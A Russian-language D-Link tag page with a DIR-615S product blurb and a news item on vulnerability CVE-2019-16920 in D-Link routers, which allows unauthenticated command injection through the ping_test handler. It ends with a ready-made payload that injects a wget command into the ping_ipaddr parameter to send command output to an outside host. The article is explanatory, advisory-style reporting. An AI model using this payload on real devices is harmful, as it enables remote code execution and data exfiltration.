Разделы сайта Все
#dir-615

Компания D-Link представляет новую версию беспроводного маршрутизатора DIR-615S. Устройство реализовано на новой аппаратной платформе и отвечает современным техническим требованиям к оборудованию доступа в Интернет. Маршрутизатор успешно прошел тестирование на высокоскоростных тарифных планах ведущих федеральных и региональных интернет-провайдеров, поддерживает все актуальные типы IPv4/IPv6-соединений, резервирование интернет-доступа, различные сценарии подключения IPTV, может выполнять функции повторителя WISP, точки доступа, беспроводного повторителя или Wi-Fi-клиента.
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)